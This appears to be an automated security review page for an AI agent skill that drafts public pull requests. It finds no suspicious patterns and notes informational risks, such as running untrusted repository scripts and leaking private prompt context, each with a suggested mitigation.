Pull Request
AdvisoryAudited by Static analysis on Apr 30, 2026.
Overview
No suspicious patterns detected.
Findings (0)
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
The agent may help prepare or open public pull requests, so mistakes could be visible to maintainers or the public.
The workflow can guide public contribution actions across repositories. This is the skill's stated purpose and is bounded by issue-policy checks, rate limits, scope limits, and human escalation.
Before creating or suggesting a pull request to ANY repository.
Review the diff, branch target, and PR description before publishing, especially for repositories you do not maintain.
If the target repository is untrusted, its test or build scripts could affect the local environment.
Running repository-defined tests, linting, or build commands can execute code from the target repository. This is disclosed and central to PR validation, but still deserves user awareness.
**Tests pass** — Run project's test command (check package.json, Makefile, etc.)
Review scripts before running them and use a clean workspace or sandbox for unfamiliar repositories; if checks cannot be run safely, state that in the PR.
Private prompt details or internal context could be exposed if copied into a public PR without review.
Prompt or session logs may contain private context. The instruction is optional and paired with a no-secrets rule, but users should sanitize anything shared in a PR.
Include context — Prompts or session logs if available and helpful
Share only relevant, scrubbed AI context and never include secrets, credentials, private URLs, or sensitive project details.